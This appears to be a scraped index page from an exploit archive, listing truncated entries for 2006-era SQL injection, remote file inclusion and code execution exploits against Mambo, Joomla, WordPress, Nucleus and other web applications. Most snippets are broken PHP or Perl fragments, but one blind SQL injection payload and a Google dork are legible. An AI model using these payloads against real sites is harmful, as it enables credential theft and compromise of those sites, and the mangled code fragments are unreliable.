Mambo 4.6rc1 - Weblinks Blind SQL Injection (2)

!/usr/bin/php -q -d shortopentag=on 126 $result.=" ."; else $result.=" ".$string$i; if strlendechexord$string$i==2 $exa.=" ".dechexord$string$i; else $exa.=" 0".dechexord$string$i; $cont++;if $cont==15 $cont=0; $result.="\r\n"; $exa.="\r\n"; return $exa."\r\n".$result; $proxyregex =...

Joomla <= 1.0.9 (Weblinks) Remote Blind SQL Injection Exploit

No description provided by source. !/usr/bin/php -q -d shortopentag=on ? echo "Joomla = 1.0.9 'Weblinks' blind SQL injection / admin credentials\r\n"; echo "disclosure exploit benchmark vesion\r\n"; echo "by rgod [email protected]\r\n"; echo "site: http://retrogod.altervista.org\r\n"; if $argc5...

Mambo <= 4.6rc1 (Weblinks) Blind SQL Injection Exploit

Exploit for unknown platform in category web applications ====================================================== Mambo mysqld --log=mambo.txt now login, go to "Submit Weblink" feature, in "Name: " field type: 99999' UNION SELECT IF ASCIISUBSTRINGpassword,1,1=0 & 1, benchmark200000000,CHAR0,0 FROM...

lifetype_104_sql.txt

!/usr/bin/php -q -d shortopentag=on 126 $result.=" ."; else $result.=" ".$string$i; if strlendechexord$string$i==2 $exa.=" ".dechexord$string$i; else $exa.=" 0".dechexord$string$i; $cont++;if $cont==15 $cont=0; $result.="\r\n"; $exa.="\r\n"; return $exa."\r\n".$result; $proxyregex =...

LifeType 1.0.4 - SQL Injection

!/usr/bin/php -q -d shortopentag=on 126 $result.=" ."; else $result.=" ".$string$i; if strlendechexord$string$i==2 $exa.=" ".dechexord$string$i; else $exa.=" 0".dechexord$string$i; $cont++;if $cont==15 $cont=0; $result.="\r\n"; $exa.="\r\n"; return $exa."\r\n".$result; $proxyregex =...

[SA20376] Firefox Multiple Vulnerabilities

---------------------------------------------------------------------- Want to join the Secunia Security Team? Secunia offers a position as a security specialist, where your daily work involves reverse engineering of software and exploit code, auditing of source code, and analysis of vulnerabilit...

pppBlog-0.3.8.txt

!/usr/bin/php -q -d shortopentag=on ? echo "pppBlog = 0.3.8 system disclosure exploit\r\n"; echo "by rgod [email protected]\r\n"; echo "site: http://retrogod.altervista.org\r\n\r\n"; echo "dork: intext:"Powered by pppblog"\r\n\r\n"; / works with: registerglobals=On / if $argc4 echo "Usage: php...

pppBlog &lt;= 0.3.8 (randompic.php) System Disclosure Exploit

No description provided by source. !/usr/bin/php -q -d shortopentag=on ? echo "pppBlog = 0.3.8 system disclosure exploit\r\n"; echo "by rgod [email protected]\r\n"; echo "site: http://retrogod.altervista.org\r\n\r\n"; echo "dork: intext:"Powered by pppblog"\r\n\r\n"; / works with:...

WordPress 2.0.2 - cache Remote Shell Injection

WordPress 2.0.2 - cache Remote Shell Injection !/usr/bin/php -q -d shortopentag=on ? echo "--------------------------------------------------------------------\r\n"; echo "| WordPress = 2.0.2 'cache' shell injection exploit |\r\n"; echo "| by rgod [email protected] |\r\n"; echo "| site:...

Drupal &lt;= 4.7 (attachment mod_mime) Remote Exploit

No description provided by source. !/usr/bin/php -q -d shortopentag=on ? echo "Drupal = 4.7 attachment modmime poc exploit\r\n"; echo "by rgod [email protected]\r\n"; echo "site: http://retrogod.altervista.org\r\n\r\n"; / this works with a user account with upload rights and with permissions to...

Nucleus CMS 3.22 - DIR_LIBS Remote File Inclusion

Nucleus CMS 3.22 - DIRLIBS Remote File Inclusion !/usr/bin/php -q -d shortopentag=on ? echo "Nucleus = 3.22 arbitrary remote inclusion exploit\r\n"; echo "by rgod [email protected]\r\n"; echo "site: http://retrogod.altervista.org\r\n\r\n"; echo "this is called the "deadly eyes of Sun-tzu"\r\n";...

Nucleus CMS 3.22 - &#039;DIR_LIBS&#039; Remote File Inclusion

!/usr/bin/php -q -d shortopentag=on \r\n"; die...

Nucleus CMS <= 3.22 (DIR_LIBS) Arbitrary Remote Inclusion Exploit

Exploit for unknown platform in category web applications ================================================================= Nucleus CMS = 3.22 DIRLIBS Arbitrary Remote Inclusion Exploit ================================================================= !/usr/bin/php -q -d shortopentag=on ? echo...

deluxebb.txt

!/usr/bin/php -q -d shortopentag=on ? echo "DeluxeBB = v1.06 attachment modmime exploit\r\n"; echo "by rgod [email protected]\r\n"; echo "site: http://retrogod.altervista.org\r\n"; echo "tested & working against a fresh deluxebb installation\r\n\r\n"; if $argc4 echo "Usage: php ".$argv0." host...

SEC-20060512-0.txt

SEC Consult Security Advisory 20060512-0 ============================================================== title: Symantec Enterprise Firewall NAT/HTTP Proxy Private IP Exposure program: Symantec Enterprise FW vulnerable version: 8.0 homepage: www.symantec.com found: 2005-09-13 by: SEC Consult /...

DeluxeBB 1.06 - &#039;Attachment mod_mime&#039; Remote Command Execution

!/usr/bin/php -q -d shortopentag=on ? echo "DeluxeBB = v1.06 attachment modmime exploit\r\n"; echo "by rgod [email protected]\r\n"; echo "site: http://retrogod.altervista.org\r\n"; echo "tested & working against a fresh deluxebb installation\r\n\r\n"; if $argc4 echo "Usage: php ".$argv0." host...

HiveMail <= 1.3 (addressbook.add.php) Remote Code Execution Exploit

Exploit for unknown platform in category web applications =================================================================== HiveMail = 1.3 addressbook.add.php Remote Code Execution Exploit =================================================================== !/usr/bin/perl HiveMail = 1.3 remote...

Invision Power Board 2.1.5 - search.php Remote Code Execution

Invision Power Board 2.1.5 - search.php Remote Code Execution !/usr/bin/perl Wed Apr 26 16:44:15 CEST 2006 [email protected] INVISION POWER BOARD 2.1.5 pr00f 0f c0ncept remote command execution. vuln credits goes to IceShaman. works only if you have perms to post a comment. Exploit with replye is...

Invision Power Board <= 2.1.5 search.php Remote Code Execution Exploit

Exploit for unknown platform in category web applications ====================================================================== Invision Power Board pr00f 0f c0ncept remote command execution. vuln credits goes to IceShaman. works only if you have perms to post a comment. Exploit with replye is i...

DeleGate DNS Response Message DoS

The remote host is running Delegate, a multi-application proxy. The remote version of this software is vulnerable to a denial of service when processing invalid DNS responses. An attacker may exploit this flaw to disable this service remotely. To exploit this flaw, an attacker would need to be ab...